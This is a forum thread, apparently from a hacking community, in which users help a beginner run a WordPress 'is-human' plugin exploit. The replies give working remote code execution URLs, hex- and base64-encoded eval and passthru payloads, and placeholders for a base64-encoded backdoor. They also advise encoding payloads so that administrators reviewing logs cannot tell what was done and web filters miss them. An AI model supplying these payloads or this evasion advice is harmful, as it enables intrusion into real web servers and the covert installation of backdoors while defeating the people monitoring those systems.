Wordpress plugin exploit

[jonas]

Hi,
I'm playing around with my wordpress installation trying out various exploits found on exploit-db.  However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, i would like to get spacing in there. I tried URL encoding (likeipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could i run other types of code in there to upload php backdoor or connect and download it from ftp to webroot or similar?

Any help please?

Error message using URL encoding:

eprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

[Data_Raid]

I'm no expert but ..... would $nbsp; work?

Code:

(ipconfig$nbsp;/all)

[hayabusa]

I'm also guessing (not sitting by a machine to try it, right the moment) that it doesn't like the / character, and you might need to encode that, as well, if simply using the %20 for the space doesn't work.

Part of your error info lends to my thinking, too:

"Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

It's misinterpreting the / as a division, and turning your whole command into gibberish:

"Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1"

[MaXe]

If you can execute PHP successfully like this:
http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error

Just use input like this:
http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval("\x41\x41\x41");error

(Those hexadecimal A's being PHP CODE that should be executed. So within eval, write passthru("IP Config") and then ENCODE it. It's very important you encode it.)

An alternative way, is:
http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode("t00wt00w"));error

Where "t00wt00w" is a base64 encoded backdoor.

Need help? Try HaXxd00r (you may encounter encoding errors fyi!)

Reference: www.intern0t.net/haxxd00r
(Yes, it's free to use and it's only for educationable purposes etc.)


Edit:
IF you're already within an eval() statement, you should avoid using eval() again. It may not work as intended. But feel free to try.

You could try something like this:
http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();base64_decode("t00wt00w");error

Where "t00wt00w" is a base64 encoded backdoor or whatever you want. Have fun! 

[hayabusa]

MaXe has a good point, and beat me to it.  Was about to reply again, and simply suggest that best practice would be to encode the whole string, anyway. 

Multiple reasons:

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway 

[MaXe]

Multiple reasons: (for encoding a payload - MaXe)

1.) gets you past errors like you hit

2.) less chance that an admin reviewing a log would have a clue what it was you actually did

3.) gets you past other web filtering solutions they might have in place.

4.) it's way cooler anyway 

Quoted for Truth! 

[jonas]

Hehe. Absolutely way cooler in hex!!   I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!

[jonas]

Hi again guys,
I tried the stuff you said and I'm somewhat convinced this should work!  However it doesn't!  I'ts most likely me doing something wrong...

I tried alot of stuff like (ipconfig):

http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x69\x6e\x63\x6c\x75\x64\x65\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x5d\x29\x3b");error

Tried both POST/GET just to check it out.
I also tried various variants of the base64 with different function calls.
Errors are turned off.

Most of the time im getting this error message:

Parse error: syntax error, unexpected '"', expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Removing apostrophes gives me:
Parse error: syntax error, unexpected T_NS_SEPARATOR, expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Any clues? 
Btw, that "HaXxd00r" was pure awesomeness =)

[MaXe]

I'm not sure if passthru() Accepts that kind of input, even though it should, but then again.. It takes arguments and executes them as commands on the target Operating System, so if it doesn't convert the input, then an error would be returned.

Try: passthru(base64_decode("bHMgLWFs"))
Or: passthru(base64_decode('bHMgLWFs'))
(This should execute an "ls -al" command, note there's a space included.)

For that kind hexadecimal input, you will _always_ need to encapsulate the input in quotes " in most cases, using apostrophes ' may not work, even though it should!   (I think I encountered a problem like this once, a long time ago, not 100% sure since it should be the same, in most cases where variables and other special characters are not used.)

Note:
Hmm, but after thinking about the first error for a while, the error could be caused due to you use ", and you should try to use ' then. I know it sounds strange, but all I can do is guess when I don't have the source code of that engine.php script